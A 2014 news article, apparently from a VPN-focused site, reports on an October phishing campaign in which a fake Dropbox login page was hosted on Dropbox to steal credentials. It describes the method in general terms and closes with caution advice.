Dropbox Used For Elaborate Phishing Attack

By Paul Liu
Friday, November 21st, 2014

---

The cloud storage service provider Dropbox was reportedly used for an advanced phishing attack in the month of October. The attack affected hundreds of thousands of users and was the second major attack to target the service in quick succession. While an earlier attack was the result of a major security breach and caused seven million Dropbox users to lose their login credentials, the latest one spread through spam emails and invited users to spill their login details through a fake login page. The attack was detected by the security firm Symantec which passed the information to Dropbox for further action.

The modus operandi used for the latest attack was a lot more sophisticated than what is used in a typical phishing attack. The email used in the attack informed Dropbox users that they have received an important file which is too big to be sent via email or cannot be sent through the medium due to security reasons. The email then encouraged the users to check the file on Dropbox by visiting the link provided alongside. The attackers even marked the email as important to coerce the users into clicking on the link. When users clicked on the link, they were redirected to a fake Dropbox login page that was set up just to steal login credentials from the users.

Unlike the spoofing pages used in other phishing attacks, the fake login page used in this attack was hosted on Dropbox itself! This tricked users into believing that they have indeed received an important file and encouraged them to supply their login credentials. After the users supplied their Dropbox login and password details, they were redirected to the actual Dropbox website while their credentials were sent to a web server controlled by the attackers.

By hosting the spoof page on Dropbox, the attackers were able to achieve several goals. First of all, they were able to convince tech savvy users who can usually spot fake login pages hosted on random domains into supplying their credentials. Secondly, the attack even fooled people who normally do not click on the links contained within the emails since even typing the link manually led to a page hosted on Dropbox. Finally, the attack methodology allowed the attackers to use the SSL security provided by Dropbox as a part of their attacks. Users visiting the spoof page by using the latest version of a popular browser would have seen a security warning (regarding parts of the page not using SSL security) but older browsers would not have flashed any warnings at all.

Symantec said that the spoof page was also used to capture Gmail, AOL, Windows Live and Yahoo account details through an option that was marked as “Other emails”. When users clicked on these links, they were redirected to landing sites that mimicked the login pages of services like Facebook, Google Docs and Microsoft OneDrive. Dropbox was quick to shut down the spoof page as soon as it became aware of its existence but not before the login credentials of thousands of users were compromised. The attack once again highlights that criminals are getting more and more sophisticated and are using novel methods to steal our personal data. It also shows that we need to exercise extreme caution while supplying our credentials as well as avoid clicking on suspicious links or visiting untrusted websites.

---

• VPN Articles and News

November 21, 2014

• 0 Comments
• Leave Comment